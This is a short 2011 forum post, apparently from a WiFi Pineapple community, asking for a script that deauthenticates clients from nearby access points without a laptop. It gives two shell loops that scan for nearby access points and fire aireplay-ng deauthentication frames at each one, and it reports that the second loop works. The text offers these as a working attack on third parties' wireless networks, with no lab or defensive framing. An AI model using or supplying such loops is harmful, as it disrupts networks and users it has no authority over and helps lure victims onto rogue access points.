Kjwon15 Posted November 29, 2011 Posted November 29, 2011 karma script is pretty good. but I want to use pineapple without laptop. i thought "how can i deauth clients from other APs" first, I tried this: for ap in $(iwlist wlan0 scan|grep Address|cut -b 30-) do aireplay-ng mon0 -0 4 -D -a $ap done but it isn't works because wlan0 was master mode. and mon0(monitor mode) isn't work either. so, i add some trick for it for ap in $(aireplay-ng mon0 -9 | grep channel | awk '{print $2}') do aireplay-ng mon0 -0 4 -D -a $ap done it works and dont need deny list(air*-ng don't get self BSSID) but aireplay-ng gets AP list less then 'iwlist scan' somebody has any script? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.